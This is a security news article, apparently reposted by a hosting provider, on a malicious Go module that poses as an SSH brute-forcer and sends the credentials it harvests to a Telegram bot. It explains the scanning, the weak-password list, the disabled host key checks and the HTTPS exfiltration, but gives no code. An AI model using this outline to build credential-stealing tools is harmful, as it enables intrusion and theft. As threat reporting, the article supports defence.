Cybersecurity researchers have recently uncovered a malicious Go module that disguises itself as an SSH brute-force tool, but its true function is to covertly exfiltrate user credentials. This module, known as "golang-random-ip-ssh-bruteforce," transmits sensitive information, such as the target’s IP address, username, and password, to a Telegram bot controlled by the threat actor after a successful login.
Published on June 24, 2022, the package was associated with an now-inaccessible GitHub account named IllDieAnyway, yet it remains available on pkg.go.dev. The malware scans random IPv4 addresses for open SSH services on TCP port 22 and uses an embedded list of weak usernames and passwords to launch brute-force attacks.
A significant feature of the malware is that it disables host key verification, allowing the SSH client to connect to any server without confirming its identity. The password list primarily includes common usernames like "root" and "admin" paired with easily guessable passwords such as "password," "12345678," and "qwerty."
The malicious code runs indefinitely, attempting multiple SSH logins concurrently with the provided username-password pairs. After successfully obtaining credentials, the information is sent to a Telegram bot called "@sshZXC_bot" via the Telegram Bot API, which verifies the receipt of the data. Additionally, the account receiving the information has the handle "@io_ping."
Archived snapshots reveal that IllDieAnyway’s software portfolio previously included various tools such as an IP port scanner and an Instagram media parser, showcasing a pattern of malicious software development. The threat actor is suspected to have Russian origins, contributing to a broader concern about pervasive cyber threats.
According to the researchers, the behavior of this module spreads risk to unwitting operators while consolidating successful attacks through a single control point. By using HTTPS for communication with the Telegram bot, the malware can evade detection by traditional security controls, making it a particularly insidious threat.
Welcome to DediRock, your trusted partner in high-performance hosting solutions. At DediRock, we specialize in providing dedicated servers, VPS hosting, and cloud services tailored to meet the unique needs of businesses and individuals alike. Our mission is to deliver reliable, scalable, and secure hosting solutions that empower our clients to achieve their digital goals. With a commitment to exceptional customer support, cutting-edge technology, and robust infrastructure, DediRock stands out as a leader in the hosting industry. Join us and experience the difference that dedicated service and unwavering reliability can make for your online presence. Launch our website.